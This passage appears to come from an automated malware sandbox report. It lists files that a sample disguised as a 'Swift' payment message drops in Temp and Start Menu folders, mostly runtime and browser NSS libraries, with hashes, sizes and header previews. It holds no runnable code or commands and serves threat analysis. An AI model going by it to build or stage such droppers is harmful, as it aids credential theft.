SSDEEP:	192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
MD5:	A2F2258C32E3BA9ABF9E9E38EF7DA8C9
SHA1:	116846CA871114B7C54148AB2D968F364DA6142F
SHA-256:	565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
SHA-512:	E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................\|..O........9...d...d.......\|..O........d...............\|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................\|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-math-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28984
Entropy (8bit):	6.6686462438397
Encrypted:	false
SSDEEP:	384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
MD5:	8B0BA750E7B15300482CE6C961A932F0
SHA1:	71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
SHA-256:	BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
SHA-512:	FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-multibyte-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26424
Entropy (8bit):	6.712286643697659
Encrypted:	false
SSDEEP:	384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
MD5:	35FC66BD813D0F126883E695664E7B83
SHA1:	2FD63C18CC5DC4DEFC7EA82F421050E668F68548
SHA-256:	66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
SHA-512:	65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-private-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73016
Entropy (8bit):	5.838702055399663
Encrypted:	false
SSDEEP:	1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
MD5:	9910A1BFDC41C5B39F6AF37F0A22AACD
SHA1:	47FA76778556F34A5E7910C816C78835109E4050
SHA-256:	65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
SHA-512:	A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-process-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.076072254895036
Encrypted:	false
SSDEEP:	192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
MD5:	8D02DD4C29BD490E672D271700511371
SHA1:	F3035A756E2E963764912C6B432E74615AE07011
SHA-256:	C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
SHA-512:	D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-runtime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22840
Entropy (8bit):	6.942029615075195
Encrypted:	false
SSDEEP:	384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
MD5:	41A348F9BEDC8681FB30FA78E45EDB24
SHA1:	66E76C0574A549F293323DD6F863A8A5B54F3F9B
SHA-256:	C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
SHA-512:	8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-stdio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24368
Entropy (8bit):	6.873960147000383
Encrypted:	false
SSDEEP:	384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
MD5:	FEFB98394CB9EF4368DA798DEAB00E21
SHA1:	316D86926B558C9F3F6133739C1A8477B9E60740
SHA-256:	B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
SHA-512:	57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23488
Entropy (8bit):	6.840671293766487
Encrypted:	false
SSDEEP:	384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
MD5:	404604CD100A1E60DFDAF6ECF5BA14C0
SHA1:	58469835AB4B916927B3CABF54AEE4F380FF6748
SHA-256:	73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
SHA-512:	DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-time-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.018061005886957
Encrypted:	false
SSDEEP:	384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
MD5:	849F2C3EBF1FCBA33D16153692D5810F
SHA1:	1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
SHA-256:	69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
SHA-512:	44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-utility-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.127951145819804
Encrypted:	false
SSDEEP:	192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
MD5:	B52A0CA52C9C207874639B62B6082242
SHA1:	6FB845D6A82102FF74BD35F42A2844D8C450413B
SHA-256:	A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
SHA-512:	18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...\|.......................

C:\Users\user\AppData\Local\Temp\E0F35830\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	332752
Entropy (8bit):	6.8061257098244905
Encrypted:	false
SSDEEP:	6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z
MD5:	343AA83574577727AABE537DCCFDEAFC
SHA1:	9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06
SHA-256:	393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
SHA-512:	827425D98BA491CD30929BEE6D658FCF537776CE96288180FE670FA6320C64177A7214FF4884AE3AA68E135070F28CA228AFB7F4012B724014BA7D106B5F0DCE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L......Z.........."!.........f...............................................p......o.....@.............................P...`........@..p....................P..........T...........................8...@...............8............................text...U........................... ..`.rdata..............................@..@.data...lH..........................@....rsrc...p....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E0F35830\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	139216
Entropy (8bit):	6.841477908153926
Encrypted:	false
SSDEEP:	3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR
MD5:	9E682F1EB98A9D41468FC3E50F907635
SHA1:	85E0CECA36F657DDF6547AA0744F0855A27527EE
SHA-256:	830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
SHA-512:	230230722D61AC1089FABF3F2DECFA04F9296498F8E2A2A49B1527797DCA67B5A11AB8656F04087ACADF873FA8976400D57C77C404EBA4AFF89D92B9986F32ED
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."yQ.f.?Mf.?Mf.?Mo`.Mv.?M.z>Lb.?M...Md.?M.z<Lh.?M.z;Lm.?M.z:Lu.?MDx>Lo.?Mf.>M..?M.{1Lu.?M.{?Lg.?M.{.Mg.?M.{=Lg.?MRichf.?M................PE..L......Z.........."!.........................................................@............@.............................\...L...,.... ..p....................0......p...T...............................@...................T...@....................text............................... ..`.rdata...b.......d..................@..@.data...............................@....rsrc...p.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E0F35830\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E0F35830\nss3.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1244112
Entropy (8bit):	6.809431682312062
Encrypted:	false
SSDEEP:	24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
MD5:	556EA09421A0F74D31C4C0A89A70DC23
SHA1:	F739BA9B548EE64B13EB434A3130406D23F836E3
SHA-256:	F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
SHA-512:	2481FC80DFFA8922569552C3C3EBAEF8D0341B80427447A14B291EC39EA62AB9C05A75E85EEF5EA7F857488CAB1463C18586F9B076E2958C5A314E459045EDE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x..c+..c+..c+...+..c++.b..c+lh.+..c++.`..c++.f..c++.g..c+.b..c+9.b..c+..b+..c+9.k..c+9.gC.c+9.c..c+9..+..c+9.a..c+Rich..c+................PE..L...a..Z.........."!................T........................................@............@.............................d....<..T.......h.......................t~..0...T...............................@............................................text............................... ..`.rdata...P.......R..................@..@.data....E...`... ...:..............@....rsrc...h............Z..............@..@.reloc..t~...........^..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E0F35830\nssdbm3.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92624
Entropy (8bit):	6.639368309935547
Encrypted:	false
SSDEEP:	1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
MD5:	569A7A65658A46F9412BDFA04F86E2B2
SHA1:	44CC0038E891AE73C43B61A71A46C97F98B1030D
SHA-256:	541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
SHA-512:	C027B9D06C627026774195D3EAB72BD245EBBF5521CB769A4205E989B07CB4687993A47061FF6343E6EC1C059C3EC19664B52ED3A1100E6A78CFFB1C46472AFB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L......Z.........."!.........0...............0............................................@..........................?.......@.......`..p............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..4....0... ..................@..@.data........P.......>..............@....rsrc...p....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E0F35830\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144336
Entropy (8bit):	6.5527585854849395
Encrypted:	false
SSDEEP:	3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
MD5:	67827DB2380B5848166A411BAE9F0632
SHA1:	F68F1096C5A3F7B90824AA0F7B9DA372228363FF
SHA-256:	9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
SHA-512:	910E15FD39B48CD13427526FDB702135A7164E1748A7EACCD6716BCB64B978FE333AC26FA8EBA73ED33BD32F2330D5C343FCD3F0FE2FFD7DF54DB89052DB7148
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L......Z.........."!.........`...............................................P......+Z....@..........................................0..p....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...C.......D..................@..@.data........ ......................@....rsrc...p....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E0F35830\ucrtbase.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
SSDEEP:	24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E0F35830\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.659384359264642
Encrypted:	false
SSDEEP:	192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
MD5:	8B3830B9DBF87F84DDD3B26645FED3A0
SHA1:	223BEF1F19E644A610A0877D01EADC9E28299509
SHA-256:	F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
SHA-512:	D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Bikes\Bombekrater210\Cykelhandlerne.Sme

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	data
Category:	dropped
Size (bytes):	163713
Entropy (8bit):	6.703687358308117
Encrypted:	false
SSDEEP:	3072:j3P7bnP0jsXQmlADxsqOED1twvxrmjVlCTxgdeA1yi:r7bsjsXvlWOqOC1tww7t1J
MD5:	C15A4105508E9FC45F3218E037F75764
SHA1:	36650E7CB589FF9B505173A6FE541A180B63C505
SHA-256:	A1ED770994E83E4E8F7939F9BBF7F1B382E941EBCC31CF93CB995E5A8878AE19
SHA-512:	2933BE999B618DBC27B6EEE94176891A1AA0209B8D87650ED07E9CB32C0D1B527D35344B8A2373A3DA0BEAD331E352C58004262DA23A273FFD7F8F7F56193156
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Castrate\memstat.c

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	C source, ASCII text
Category:	dropped
Size (bytes):	13484
Entropy (8bit):	5.15716859322729
